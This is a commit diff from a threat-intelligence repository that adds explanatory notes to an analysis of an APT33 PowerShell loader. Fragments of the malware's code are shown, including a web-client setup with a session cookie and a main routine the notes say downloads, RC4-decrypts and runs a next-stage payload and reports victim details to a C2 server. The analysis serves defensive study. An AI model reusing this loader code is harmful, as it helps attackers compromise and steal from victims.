ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Analysis APT33.md

Browse Source
This commit is contained in:
StrangerealIntel 2019-11-16 21:58:25 +01:00 committed by GitHub
parent 2c74aee289
commit 450042f8f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Iran/APT/APT33/16-11-19/Analysis APT33.md
View File

@ -73,6 +73,8 @@ function DEC ($key,$enc)
} }
``` ```
<h6>The next function is used for check the local time and trigged a kill switch if this after the 12th December 2019. Once this check this setup the proxy settings if the version of the CLR is at least over the second version.</h6>
``` powershell ``` powershell
function Get-Webclient ($Cookie) function Get-Webclient ($Cookie)
{ {
@ -116,6 +118,10 @@ function Get-Webclient ($Cookie)
if ($cookie) { $webclient.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") } if ($cookie) { $webclient.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
$webclient $webclient
} }
```
<h6> The main function is called 3 times for download the next stage of the payload, decode with the secret of the RC4 algorithm and execute it. By the same time send informations of the victim to C2 as new session created.</h6>
```powershell
function main function main
{ {
$cu = [System.Security.Principal.WindowsIdentity]::GetCurrent() $cu = [System.Security.Principal.WindowsIdentity]::GetCurrent()